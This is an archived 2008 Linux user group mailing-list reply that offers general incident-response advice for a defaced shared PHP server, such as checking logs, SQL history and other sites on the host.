[sf-lug] Hacked RHEL4/PHP4 server

Kristian Erik Hermansen kristian.hermansen at gmail.com
Wed May 21 22:28:39 PDT 2008

On Wed, May 21, 2008 at 10:15 PM, Tom Haddon <tom at greenleaftech.net> wrote:
> - How did they actually modify the content? Through a PHP exploit, or
> shell access?

If your application was insecure, then sure, they could have perhaps
done this without shell access.  However, since it is shared server,
perhaps it was compormised by another local user who then changed
every site on the server.  I would investigate the other sites being
served from your shared host, or ask the hosting company if they heard
of any other complaints about similar sites being hosted from that
server.  Also, check your logs and SQL transaction history.  Maybe you
can find some abnormal queries floating around in there and trace it
back to the vulnerable PHP code, if that was the entry point...
Kristian Erik Hermansen
"When you share your joys you double them; when you share your sorrows
you halve them."

More information about the sf-lug mailing list